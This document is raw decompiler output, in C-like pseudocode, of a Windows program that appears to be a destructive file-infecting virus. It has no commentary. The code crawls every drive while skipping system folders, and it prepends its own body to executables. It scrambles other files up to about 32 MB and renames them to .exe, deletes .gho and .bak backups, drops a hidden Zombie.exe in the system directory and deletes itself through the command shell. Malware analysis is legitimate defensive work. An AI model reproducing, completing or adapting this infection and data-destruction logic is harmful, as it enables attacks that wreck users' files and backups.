/* This file was generated by the Hex-Rays decompiler version 9.4.0.260610.
   Copyright (c) 2007-2025 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

#define __thiscall __cdecl // Test compile in C mode

_DWORD *__thiscall sub_401000(_DWORD *this);
void __thiscall sub_401030(_DWORD *this);
int sub_401040();
BOOL __stdcall sub_401180(LPCSTR lpFileName);
CString *__stdcall sub_4011B0(CString *a1, char *a2);
_off_t __stdcall sub_401290(char *FileName);
int __stdcall sub_4012B0(char *FileName); // idb
void __thiscall sub_401340(void *this, char *lpFileName, int a3);
void __cdecl StartAddress(LPCSTR *a1);
void __thiscall sub_401800(void *this, char *FileName, char a3, int a4, int a5, int a6, int a7, int a8, int a9, int a10, int a11, int a12, int a13, int a14, int a15, int a16, int a17, int a18);
void __thiscall sub_401A90(const CHAR *this, int a2, int a3, int a4, int a5, int a6, int a7, int a8, int a9, int a10, int a11, int a12, int a13, int a14, int a15, int a16, int a17, int a18);
int __stdcall sub_401B30(LPCSTR lpApplicationName, int a2); // idb
void __thiscall sub_401BA0(void *this, unsigned __int8 *Str1);
void __thiscall sub_401CF0(void *this, int a2, char *a3);
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd);
// CString *__thiscall CString::CString(CString *__hidden this, const struct CString *); idb
// void __thiscall CString::~CString(CString *__hidden this); idb
// int __thiscall CString::operator=(_DWORD, _DWORD); weak
// int __thiscall CString::Right(_DWORD, _DWORD, _DWORD); weak
// int __thiscall CString::ReverseFind(CString *__hidden this, char); idb
// void __thiscall CString::TrimRight(CString *__hidden this); idb
// void __thiscall CString::TrimLeft(CString *__hidden this); idb
// CString *__thiscall CString::CString(CString *__hidden this); idb
// CString *__thiscall CString::CString(CString *__hidden this, const char *); idb
// int __thiscall CString::Left(_DWORD, _DWORD, _DWORD); weak
// int __thiscall CString::operator+=(_DWORD, _DWORD); weak
// int __stdcall operator+(_DWORD, _DWORD, _DWORD); weak
// int __stdcall operator+(_DWORD, _DWORD, _DWORD); weak
// void __thiscall CFileFind::~CFileFind(CFileFind *__hidden this); idb
// void __thiscall CFileFind::Close(CFileFind *__hidden this); idb
// int __thiscall CString::Find(CString *__hidden this, const char *); idb
// int __thiscall CFileFind::GetFilePath(_DWORD, _DWORD); weak
// int __thiscall CFileFind::IsDots(CFileFind *__hidden this); idb
// int __thiscall CFileFind::FindNextFileA(CFileFind *__hidden this); idb
// int __thiscall CFileFind::FindFile(CFileFind *__hidden this, const char *, unsigned int); idb
// CFileFind *__thiscall CFileFind::CFileFind(CFileFind *__hidden this); idb
// int __thiscall CString::operator=(_DWORD, _DWORD); weak
int __cdecl UserMathErrorFunction();

//-------------------------------------------------------------------------
// Data declarations

// extern HANDLE (__stdcall *GetCurrentThread)();
// extern HANDLE (__stdcall *GetCurrentProcess)();
// extern BOOL (__stdcall *SetPriorityClass)(HANDLE hProcess, DWORD dwPriorityClass);
// extern LPSTR (__stdcall *lstrcatA)(LPSTR lpString1, LPCSTR lpString2);
// extern LPSTR (__stdcall *lstrcpyA)(LPSTR lpString1, LPCSTR lpString2);
// extern DWORD (__stdcall *GetEnvironmentVariableA)(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize);
// extern DWORD (__stdcall *GetShortPathNameA)(LPCSTR lpszLongPath, LPSTR lpszShortPath, DWORD cchBuffer);
// extern DWORD (__stdcall *GetModuleFileNameA)(HMODULE hModule, LPSTR lpFilename, DWORD nSize);
// extern DWORD (__stdcall *GetFileAttributesA)(LPCSTR lpFileName);
// extern BOOL (__stdcall *DeleteFileA)(LPCSTR lpFileName);
// extern BOOL (__stdcall *SetFileAttributesA)(LPCSTR lpFileName, DWORD dwFileAttributes);
// extern UINT (__stdcall *GetSystemDirectoryA)(LPSTR lpBuffer, UINT uSize);
// extern DWORD (__stdcall *WaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);
// extern BOOL (__stdcall *CreateProcessA)(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
// extern void (__stdcall *Sleep)(DWORD dwMilliseconds);
// extern DWORD (__stdcall *GetLogicalDrives)();
// extern BOOL (__stdcall *SetThreadPriority)(HANDLE hThread, int nPriority);
// extern uintptr_t (__cdecl *beginthread)(_beginthread_proc_type StartAddress, unsigned int StackSize, void *ArgList);
// extern int (__cdecl *rand)();
// extern int (__cdecl *fgetc)(FILE *Stream);
// extern int (__cdecl *fputc)(int Character, FILE *Stream);
// extern size_t (__cdecl *fwrite)(const void *Buffer, size_t ElementSize, size_t ElementCount, FILE *Stream);
// extern int (__cdecl *rename)(const char *OldFilename, const char *NewFilename);
// extern FILE *(__cdecl *fopen)(const char *FileName, const char *Mode);
// extern int (__cdecl *fseek)(FILE *Stream, int Offset, int Origin);
// extern size_t (__cdecl *fread)(void *Buffer, size_t ElementSize, size_t ElementCount, FILE *Stream);
// extern int (__cdecl *fclose)(FILE *Stream);
// extern int (__cdecl *stat)(const char *const FileName, struct _stat32 *const Stat);
// extern int (__cdecl *mbscmp)(const unsigned __int8 *Str1, const unsigned __int8 *Str2);
// extern BOOL (__stdcall *ShellExecuteExA)(SHELLEXECUTEINFOA *pExecInfo);
// extern void (__stdcall *SHChangeNotify)(LONG wEventId, UINT uFlags, LPCVOID dwItem1, LPCVOID dwItem2);
// extern HICON (__stdcall *LoadIconA)(HINSTANCE hInstance, LPCSTR lpIconName);
// extern int (__stdcall *MessageBoxA)(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType);
_UNKNOWN *off_403138 = &loc_401010; // weak
char aOpen[5] = "Open"; // weak
CHAR aNul[] = " > nul"; // idb
CHAR String2[] = "/c del "; // idb
CHAR Name[] = "COMSPEC"; // idb
char Mode[] = "rb"; // idb
char aExe_1[6] = "_.exe"; // weak
unsigned __int8 Str2[] = { 46u, 101u, 120u, 101u, 0u }; // idb
char aWb[] = "wb"; // idb
char aTmp[5] = ".tmp"; // weak
char asc_404050[2] = "_"; // weak
char aZombieExe[12] = "\\Zombie.exe"; // weak
CHAR Caption[1] = "_"; // idb
_UNKNOWN unk_404070; // weak
_UNKNOWN unk_404090; // weak
_UNKNOWN unk_4040B0; // weak
_UNKNOWN unk_4040D0; // weak
unsigned __int8 aBak_0[] = { 46u, 66u, 65u, 75u, 0u }; // idb
unsigned __int8 aBak[] = { 46u, 98u, 97u, 107u, 0u }; // idb
unsigned __int8 aGho[] = { 46u, 71u, 72u, 79u, 0u }; // idb
unsigned __int8 aGho_0[] = { 103u, 104u, 111u, 0u }; // idb
unsigned __int8 aExe_0[] = { 46u, 69u, 88u, 69u, 0u }; // idb
char aWinnt[] = "WINNT"; // idb
char aWindows[] = "WINDOWS"; // idb
char asc_404124[4] = "*.*"; // weak
unsigned __int8 asc_404128[] = { 92u, 0u }; // idb
char asc_40412C[2] = ":"; // weak
char byte_404138[12] = { '\0', '\0', '\0', '\0', '\0', '\0', '\0', '\0', '\0', '\0', '\0', '\0' }; // idb


//----- (00401000) --------------------------------------------------------
_DWORD *__thiscall sub_401000(_DWORD *this)
{
  *this = &off_403138;
  return this;
}
// 403138: using guessed type _UNKNOWN *off_403138;

//----- (00401030) --------------------------------------------------------
void __thiscall sub_401030(_DWORD *this)
{
  *this = &off_403138;
}
// 403138: using guessed type _UNKNOWN *off_403138;

//----- (00401040) --------------------------------------------------------
int sub_401040()
{
  HANDLE CurrentProcess; // eax
  HANDLE CurrentThread; // eax
  SHELLEXECUTEINFOA pExecInfo; // [esp+4h] [ebp-348h] BYREF
  CHAR Filename[260]; // [esp+40h] [ebp-30Ch] BYREF
  CHAR String1[260]; // [esp+144h] [ebp-208h] BYREF
  CHAR Buffer[260]; // [esp+248h] [ebp-104h] BYREF

  if ( GetModuleFileNameA(nullptr, Filename, 0x104u) == 0 )
    return 0;
  if ( GetShortPathNameA(Filename, Filename, 0x104u) == 0 )
    return 0;
  if ( GetEnvironmentVariableA(Name, Buffer, 0x104u) == 0 )
    return 0;
  lstrcpyA(String1, String2);
  lstrcatA(String1, Filename);
  lstrcatA(String1, aNul);
  pExecInfo.cbSize = 60;
  pExecInfo.hwnd = nullptr;
  pExecInfo.lpVerb = aOpen;
  pExecInfo.lpFile = Buffer;
  pExecInfo.lpParameters = String1;
  pExecInfo.lpDirectory = nullptr;
  pExecInfo.nShow = 0;
  pExecInfo.fMask = 64;
  if ( !ShellExecuteExA(&pExecInfo) )
    return 0;
  SetPriorityClass(pExecInfo.hProcess, 0x40u);
  CurrentProcess = GetCurrentProcess();
  SetPriorityClass(CurrentProcess, 0x100u);
  CurrentThread = GetCurrentThread();
  SetThreadPriority(CurrentThread, 15);
  SHChangeNotify(4, 1u, Filename, nullptr);
  return 1;
}

//----- (00401180) --------------------------------------------------------
BOOL __stdcall sub_401180(LPCSTR lpFileName)
{
  DWORD FileAttributesA; // eax

  FileAttributesA = GetFileAttributesA(lpFileName);
  return FileAttributesA != -1 && (FileAttributesA & 0x10) != 16;
}

//----- (004011B0) --------------------------------------------------------
CString *__stdcall sub_4011B0(CString *a1, char *a2)
{
  int v2; // eax
  int v3; // eax
  _BYTE v5[4]; // [esp+4h] [ebp-18h] BYREF
  _BYTE v6[4]; // [esp+8h] [ebp-14h] BYREF
  int v7; // [esp+Ch] [ebp-10h]
  int v8; // [esp+18h] [ebp-4h]

  v7 = 0;
  CString::CString((CString *)&a2, a2);
  v8 = 1;
  CString::CString((CString *)v5);
  LOBYTE(v8) = 2;
  CString::TrimLeft((CString *)&a2);
  CString::TrimRight((CString *)&a2);
  v2 = CString::ReverseFind((CString *)&a2, 92);
  v3 = CString::Right(&a2, v6, *((_DWORD *)a2 - 2) - v2 - 1);
  LOBYTE(v8) = 3;
  CString::operator=(v5, v3);
  LOBYTE(v8) = 2;
  CString::~CString((CString *)v6);
  CString::CString(a1, (const struct CString *)v5);
  v7 = 1;
  LOBYTE(v8) = 1;
  CString::~CString((CString *)v5);
  LOBYTE(v8) = 0;
  CString::~CString((CString *)&a2);
  return a1;
}
// 4020B2: using guessed type int __thiscall CString::operator=(_DWORD, _DWORD);
// 4020B8: using guessed type int __thiscall CString::Right(_DWORD, _DWORD, _DWORD);

//----- (00401290) --------------------------------------------------------
_off_t __stdcall sub_401290(char *FileName)
{
  struct _stat32 Stat; // [esp+0h] [ebp-24h] BYREF

  stat(FileName, &Stat);
  return Stat.st_size;
}

//----- (004012B0) --------------------------------------------------------
int __stdcall sub_4012B0(char *FileName)
{
  int result; // eax
  FILE *v2; // esi
  _off_t v3; // edi
  _BYTE Buffer[4]; // [esp+Ch] [ebp-8h] BYREF
  int v5; // [esp+10h] [ebp-4h]

  result = (int)fopen(FileName, Mode);
  v2 = (FILE *)result;
  if ( result != 0 )
  {
    v3 = sub_401290(FileName);
    fseek(v2, v3 - 8, 0);
    fread(Buffer, 1u, 8u, v2);
    if ( v5 == v3 )
    {
      fclose(v2);
      return 1;
    }
    else
    {
      fclose(v2);
      return 0;
    }
  }
  return result;
}

//----- (00401340) --------------------------------------------------------
void __thiscall sub_401340(void *this, char *lpFileName, int a3)
{
  const CHAR *v3; // ebx
  int v4; // eax
  _off_t v5; // eax
  FILE *v6; // esi
  FILE *v7; // eax
  FILE *v8; // edi
  int i; // eax
  FILE *v10; // eax
  FILE *v11; // edi
  int j; // eax
  int v13; // ebx
  FILE *v14; // eax
  FILE *v15; // edi
  int k; // eax
  int v17; // ebx
  int m; // eax
  int v19; // eax
  int v20; // eax
  char *FileName; // [esp+10h] [ebp-164h] BYREF
  char *NewFilename; // [esp+14h] [ebp-160h] BYREF
  int Offset; // [esp+18h] [ebp-15Ch] BYREF
  unsigned int v24; // [esp+1Ch] [ebp-158h] BYREF
  void *v25; // [esp+20h] [ebp-154h] BYREF
  _DWORD v26[2]; // [esp+24h] [ebp-150h] BYREF
  char Buffer[48]; // [esp+2Ch] [ebp-148h] BYREF
  unsigned int v28; // [esp+5Ch] [ebp-118h]
  unsigned int v29; // [esp+60h] [ebp-114h]
  CHAR Filename[260]; // [esp+64h] [ebp-110h] BYREF
  int v31; // [esp+170h] [ebp-4h]

  v3 = lpFileName;
  v25 = this;
  if ( sub_401180(lpFileName) && sub_4012B0(lpFileName) == 0 )
  {
    GetModuleFileNameA(nullptr, Filename, 0x104u);
    CString::CString((CString *)&NewFilename, lpFileName);
    v31 = 0;
    CString::CString((CString *)&FileName, lpFileName);
    LOBYTE(v31) = 1;
    v4 = operator+(&Offset, &FileName, aTmp);
    LOBYTE(v31) = 2;
    CString::operator=(&FileName, v4);
    LOBYTE(v31) = 1;
    CString::~CString((CString *)&Offset);
    strcpy(Buffer, *(const char **)sub_4011B0((CString *)&Offset, lpFileName));
    CString::~CString((CString *)&Offset);
    v28 = sub_401290(lpFileName);
    if ( a3 != 0 )
      v29 = 0;
    else
      v29 = rand() % 8 + 5166;
    v26[0] = sub_401290(Filename);
    v5 = sub_401290(Filename);
    v26[1] = v5 + v28 + 64;
    v6 = fopen(FileName, aWb);
    if ( v6 == nullptr )
      goto LABEL_31;
    v7 = fopen(Filename, Mode);
    v8 = v7;
    if ( v7 == nullptr )
    {
LABEL_17:
      fclose(v6);
      DeleteFileA(FileName);
LABEL_31:
      LOBYTE(v31) = 0;
      CString::~CString((CString *)&FileName);
      v31 = -1;
      CString::~CString((CString *)&NewFilename);
      return;
    }
    for ( i = fgetc(v7); i != -1; i = fgetc(v8) )
      fputc(i, v6);
    fclose(v8);
    fwrite(Buffer, 0x38u, 1u, v6);
    if ( a3 != 0 )
    {
      v10 = fopen(lpFileName, Mode);
      v11 = v10;
      if ( v10 == nullptr )
        goto LABEL_17;
      for ( j = fgetc(v10); j != -1; j = fgetc(v11) )
        fputc(j, v6);
      fclose(v11);
    }
    else
    {
      v13 = 0;
      Offset = v28 / v29;
      v24 = v28 - v28 / v29;
      v14 = fopen(lpFileName, Mode);
      v15 = v14;
      if ( v14 == nullptr )
        goto LABEL_17;
      fseek(v14, Offset, 0);
      for ( k = fgetc(v15); k != -1; k = fgetc(v15) )
      {
        fputc(v29 + k, v6);
        if ( ++v13 == v24 )
          break;
      }
      v17 = 0;
      fseek(v15, 0, 0);
      for ( m = fgetc(v15); m != -1; m = fgetc(v15) )
      {
        fputc(v29 + m, v6);
        if ( ++v17 == Offset )
          break;
      }
      fclose(v15);
      v3 = lpFileName;
    }
    fwrite(v26, 8u, 1u, v6);
    fclose(v6);
    if ( DeleteFileA(v3) )
    {
      if ( a3 == 0 )
      {
        CString::operator+=(&NewFilename, Str2);
        while ( sub_401180(NewFilename) )
        {
          v19 = CString::Left(&NewFilename, &v24, *((_DWORD *)NewFilename - 2) - 4);
          LOBYTE(v31) = 3;
          v20 = operator+(&v25, v19, aExe_1);
          LOBYTE(v31) = 4;
          CString::operator=(&NewFilename, v20);
          LOBYTE(v31) = 3;
          CString::~CString((CString *)&v25);
          LOBYTE(v31) = 1;
          CString::~CString((CString *)&v24);
        }
      }
      rename(FileName, NewFilename);
    }
    else
    {
      DeleteFileA(FileName);
    }
    goto LABEL_31;
  }
}
// 4020B2: using guessed type int __thiscall CString::operator=(_DWORD, _DWORD);
// 4020DC: using guessed type int __thiscall CString::Left(_DWORD, _DWORD, _DWORD);
// 4020E2: using guessed type int __thiscall CString::operator+=(_DWORD, _DWORD);
// 4020E8: using guessed type int __stdcall operator+(_DWORD, _DWORD, _DWORD);

//----- (004017A0) --------------------------------------------------------
void __cdecl StartAddress(LPCSTR *a1)
{
  _DWORD v1[4]; // [esp+0h] [ebp-10h] BYREF

  sub_401000(v1);
  v1[3] = 0;
  sub_401B30(*a1, 1);
  sub_401030(v1);
}

//----- (00401800) --------------------------------------------------------
void __thiscall sub_401800(
        void *this,
        char *FileName,
        char a3,
        int a4,
        int a5,
        int a6,
        int a7,
        int a8,
        int a9,
        int a10,
        int a11,
        int a12,
        int a13,
        int a14,
        int a15,
        int a16,
        int a17,
        int a18)
{
  int v18; // ebp
  int v19; // eax
  int v20; // eax
  FILE *v21; // esi
  FILE *v22; // edi
  int i; // eax
  FILE *v24; // ebp
  int v25; // edi
  int j; // eax
  LPCSTR lpFileName; // [esp+10h] [ebp-120h] BYREF
  LPCSTR lpApplicationName; // [esp+14h] [ebp-11Ch] BYREF
  _BYTE v29[4]; // [esp+18h] [ebp-118h] BYREF
  void *v30; // [esp+1Ch] [ebp-114h]
  CHAR Buffer[260]; // [esp+20h] [ebp-110h] BYREF
  int v32; // [esp+12Ch] [ebp-4h]

  v30 = this;
  v18 = 0;
  GetSystemDirectoryA(Buffer, 0x104u);
  CString::CString((CString *)&lpFileName, Buffer);
  v32 = 0;
  CString::CString((CString *)&lpApplicationName, &a3);
  LOBYTE(v32) = 1;
  v19 = operator+(v29, &lpFileName, aZombieExe);
  LOBYTE(v32) = 2;
  CString::operator=(&lpFileName, v19);
  LOBYTE(v32) = 1;
  CString::~CString((CString *)v29);
  v20 = operator+(v29, asc_404050, &lpApplicationName);
  LOBYTE(v32) = 3;
  CString::operator=(&lpApplicationName, v20);
  LOBYTE(v32) = 1;
  CString::~CString((CString *)v29);
  if ( sub_401180(lpFileName) )
  {
    DeleteFileA(lpFileName);
  }
  else
  {
    v21 = fopen(FileName, Mode);
    if ( v21 != nullptr )
    {
      v22 = fopen(lpFileName, aWb);
      if ( v22 == nullptr )
        goto LABEL_5;
      for ( i = fgetc(v21); i != -1; i = fgetc(v21) )
      {
        fputc(i, v22);
        if ( ++v18 == a17 )
          break;
      }
      fclose(v22);
      SetFileAttributesA(lpFileName, 2u);
      beginthread((_beginthread_proc_type)StartAddress, 0, &lpFileName);
      if ( sub_401180(lpApplicationName) )
        DeleteFileA(lpApplicationName);
      v24 = fopen(lpApplicationName, aWb);
      if ( v24 != nullptr )
      {
        v25 = 0;
        fseek(v21, a17 + 56, 0);
        for ( j = fgetc(v21); j != -1; j = fgetc(v21) )
        {
          fputc(j, v24);
          if ( ++v25 == a15 )
            break;
        }
        fclose(v24);
        fclose(v21);
        SetFileAttributesA(lpApplicationName, 2u);
        sub_401B30(lpApplicationName, 1);
      }
      else
      {
LABEL_5:
        fclose(v21);
      }
    }
  }
  LOBYTE(v32) = 0;
  CString::~CString((CString *)&lpApplicationName);
  v32 = -1;
  CString::~CString((CString *)&lpFileName);
}
// 4020B2: using guessed type int __thiscall CString::operator=(_DWORD, _DWORD);
// 4020E8: using guessed type int __stdcall operator+(_DWORD, _DWORD, _DWORD);
// 4020EE: using guessed type int __stdcall operator+(_DWORD, _DWORD, _DWORD);

//----- (00401A90) --------------------------------------------------------
void __thiscall sub_401A90(
        const CHAR *this,
        int a2,
        int a3,
        int a4,
        int a5,
        int a6,
        int a7,
        int a8,
        int a9,
        int a10,
        int a11,
        int a12,
        int a13,
        int a14,
        int a15,
        int a16,
        int a17,
        int a18)
{
  LPCSTR lpText; // [esp+0h] [ebp-10h] BYREF
  int v19; // [esp+Ch] [ebp-4h]

  lpText = this;
  CString::CString((CString *)&lpText, byte_404138);
  v19 = 0;
  CString::operator+=(&lpText, &unk_4040D0);
  CString::operator+=(&lpText, &unk_4040B0);
  CString::operator+=(&lpText, &unk_404090);
  CString::operator+=(&lpText, &unk_404070);
  MessageBoxA(nullptr, lpText, Caption, 0x30u);
  v19 = -1;
  CString::~CString((CString *)&lpText);
}
// 4020E2: using guessed type int __thiscall CString::operator+=(_DWORD, _DWORD);

//----- (00401B30) --------------------------------------------------------
int __stdcall sub_401B30(LPCSTR lpApplicationName, int a2)
{
  int result; // eax
  struct _PROCESS_INFORMATION ProcessInformation; // [esp+8h] [ebp-54h] BYREF
  struct _STARTUPINFOA StartupInfo; // [esp+18h] [ebp-44h] BYREF

  memset(&StartupInfo, 0, sizeof(StartupInfo));
  StartupInfo.cb = 68;
  result = CreateProcessA(
             lpApplicationName,
             nullptr,
             nullptr,
             nullptr,
             false,
             0x20u,
             nullptr,
             nullptr,
             &StartupInfo,
             &ProcessInformation);
  if ( result != 0 )
  {
    result = a2;
    if ( a2 != 0 )
    {
      WaitForSingleObject(ProcessInformation.hProcess, 0xFFFFFFFF);
      return DeleteFileA(lpApplicationName);
    }
  }
  return result;
}

//----- (00401BA0) --------------------------------------------------------
void __thiscall sub_401BA0(void *this, unsigned __int8 *Str1)
{
  unsigned int v3; // edi
  LPCSTR lpFileName; // [esp+10h] [ebp-10h] BYREF
  int v5; // [esp+1Ch] [ebp-4h]

  CString::CString((CString *)&lpFileName, (const char *)Str1);
  v5 = 0;
  v3 = sub_401290((char *)lpFileName);
  CString::Right(&lpFileName, &Str1, 4);
  LOBYTE(v5) = 1;
  if ( mbscmp(Str1, Str2) != 0 && mbscmp(Str1, aExe_0) != 0 )
  {
    if ( mbscmp(Str1, aGho_0) != 0 && mbscmp(Str1, aGho) != 0 && mbscmp(Str1, aBak) != 0 && mbscmp(Str1, aBak_0) != 0 )
    {
      if ( v3 <= 0x1F40000 )
      {
        sub_401340(this, (char *)lpFileName, 0);
LABEL_12:
        Sleep(v3 / 0xA000);
      }
    }
    else
    {
      DeleteFileA(lpFileName);
    }
  }
  else if ( v3 <= 0xFA0000 )
  {
    sub_401340(this, (char *)lpFileName, 1);
    goto LABEL_12;
  }
  LOBYTE(v5) = 0;
  CString::~CString((CString *)&Str1);
  v5 = -1;
  CString::~CString((CString *)&lpFileName);
}
// 4020B8: using guessed type int __thiscall CString::Right(_DWORD, _DWORD, _DWORD);

//----- (00401CF0) --------------------------------------------------------
void __thiscall sub_401CF0(void *this, int a2, char *a3)
{
  const unsigned __int8 **v4; // eax
  bool v5; // bl
  int NextFileA; // edi
  int v7; // esi
  int v8; // eax
  int FilePath; // eax
  unsigned __int8 **p_Str1; // ecx
  char *v11; // [esp+Ch] [ebp-34h] BYREF
  unsigned __int8 *Str1; // [esp+10h] [ebp-30h] BYREF
  int v13; // [esp+14h] [ebp-2Ch] BYREF
  _DWORD v14[7]; // [esp+18h] [ebp-28h] BYREF
  int v15; // [esp+3Ch] [ebp-4h]
  int v16; // [esp+44h] [ebp+4h]

  v16 = a2 + 1;
  CFileFind::CFileFind((CFileFind *)v14);
  v15 = 0;
  CString::CString((CString *)&v11, a3);
  LOBYTE(v15) = 1;
  v4 = (const unsigned __int8 **)CString::Right(&v11, &a3, 1);
  v5 = mbscmp(*v4, asc_404128) != 0;
  CString::~CString((CString *)&a3);
  if ( v5 )
    CString::operator+=(&v11, asc_404128);
  CString::operator+=(&v11, asc_404124);
  if ( CFileFind::FindFile((CFileFind *)v14, v11, 0) != 0 )
  {
    do
    {
      NextFileA = CFileFind::FindNextFileA((CFileFind *)v14);
      if ( (*(int (__thiscall **)(_DWORD *, int))(v14[0] + 64))(v14, 16) != 0 )
      {
        while ( CFileFind::IsDots((CFileFind *)v14) == 0 )
        {
          CFileFind::GetFilePath(v14, &a3);
          LOBYTE(v15) = 2;
          v7 = CString::Find((CString *)&a3, aWindows);
          v8 = CString::Find((CString *)&a3, aWinnt);
          if ( v7 <= 0 && v8 <= 0 )
          {
            sub_401CF0(v16, a3);
            LOBYTE(v15) = 1;
            p_Str1 = (unsigned __int8 **)&a3;
            goto LABEL_12;
          }
          LOBYTE(v15) = 1;
          CString::~CString((CString *)&a3);
          NextFileA = CFileFind::FindNextFileA((CFileFind *)v14);
          if ( (*(int (__thiscall **)(_DWORD *, int))(v14[0] + 64))(v14, 16) == 0 )
            break;
        }
      }
      if ( (*(int (__thiscall **)(_DWORD *, int))(v14[0] + 64))(v14, 16) == 0
        && CFileFind::IsDots((CFileFind *)v14) == 0 )
      {
        CString::CString((CString *)&Str1);
        LOBYTE(v15) = 3;
        FilePath = CFileFind::GetFilePath(v14, &v13);
        LOBYTE(v15) = 4;
        CString::operator=(&Str1, FilePath);
        LOBYTE(v15) = 3;
        CString::~CString((CString *)&v13);
        sub_401BA0(this, Str1);
        LOBYTE(v15) = 1;
        p_Str1 = &Str1;
LABEL_12:
        CString::~CString((CString *)p_Str1);
      }
    }
    while ( NextFileA != 0 );
  }
  CFileFind::Close((CFileFind *)v14);
  LOBYTE(v15) = 0;
  CString::~CString((CString *)&v11);
  v15 = -1;
  CFileFind::~CFileFind((CFileFind *)v14);
}
// 4020B2: using guessed type int __thiscall CString::operator=(_DWORD, _DWORD);
// 4020B8: using guessed type int __thiscall CString::Right(_DWORD, _DWORD, _DWORD);
// 4020E2: using guessed type int __thiscall CString::operator+=(_DWORD, _DWORD);
// 402106: using guessed type int __thiscall CFileFind::GetFilePath(_DWORD, _DWORD);

//----- (00401F10) --------------------------------------------------------
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
  FILE *v4; // esi
  _off_t v5; // eax
  int v6; // edx
  DWORD LogicalDrives; // edi
  int v8; // esi
  int i; // ebx
  int v11; // [esp+Ch] [ebp-148h] BYREF
  char *Buffer; // [esp+10h] [ebp-144h] BYREF
  int v13; // [esp+14h] [ebp-140h]
  int v14; // [esp+18h] [ebp-13Ch] BYREF
  int v15; // [esp+1Ch] [ebp-138h]
  int v16; // [esp+20h] [ebp-134h]
  int v17; // [esp+24h] [ebp-130h]
  int v18; // [esp+28h] [ebp-12Ch]
  int v19; // [esp+2Ch] [ebp-128h]
  int v20; // [esp+30h] [ebp-124h]
  int v21; // [esp+34h] [ebp-120h]
  int v22; // [esp+38h] [ebp-11Ch]
  int v23; // [esp+3Ch] [ebp-118h]
  int v24; // [esp+40h] [ebp-114h]
  int v25; // [esp+44h] [ebp-110h]
  int v26; // [esp+48h] [ebp-10Ch]
  int v27; // [esp+4Ch] [ebp-108h]
  CHAR Filename[260]; // [esp+50h] [ebp-104h] BYREF

  LoadIconA(hInstance, (LPCSTR)0x65);
  sub_401000(&v11);
  GetModuleFileNameA(nullptr, Filename, 0x104u);
  if ( sub_4012B0(Filename) != 0 )
  {
    v4 = fopen(Filename, Mode);
    if ( v4 != nullptr )
    {
      v5 = sub_401290(Filename);
      fseek(v4, v5 - 8, 0);
      fread(&Buffer, 8u, 1u, v4);
      fseek(v4, (int)Buffer, 0);
      fread(&v14, 0x38u, 1u, v4);
      fclose(v4);
      if ( v27 != 0 )
        sub_401A90(
          (const CHAR *)&v11,
          (int)Filename,
          v14,
          v15,
          v16,
          v17,
          v18,
          v19,
          v20,
          v21,
          v22,
          v23,
          v24,
          v25,
          v26,
          v27,
          (int)Buffer,
          v13);
      else
        sub_401800(&v11, Filename, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, 0, (int)Buffer, v13);
    }
  }
  else
  {
    CString::CString((CString *)&Buffer);
    LogicalDrives = GetLogicalDrives();
    v8 = 1;
    for ( i = 0; i < 26; ++i )
    {
      if ( (v8 & LogicalDrives) != 0 )
      {
        LOBYTE(v6) = i + 65;
        CString::operator=(&Buffer, v6);
        CString::operator+=(&Buffer, asc_40412C);
        sub_401CF0(&v11, 0, Buffer);
      }
      v8 *= 2;
    }
    sub_401040();
    CString::~CString((CString *)&Buffer);
  }
  sub_401030(&v11);
  return 0;
}
// 402047: variable 'v6' is possibly undefined
// 4020E2: using guessed type int __thiscall CString::operator+=(_DWORD, _DWORD);
// 402124: using guessed type int __thiscall CString::operator=(_DWORD, _DWORD);

//----- (004022AC) --------------------------------------------------------
int __cdecl UserMathErrorFunction()
{
  return 0;
}

// nfuncs=47 queued=16 decompiled=16 lumina nreq=0 worse=0 better=0
// ALL OK, 16 function(s) have been successfully decompiled
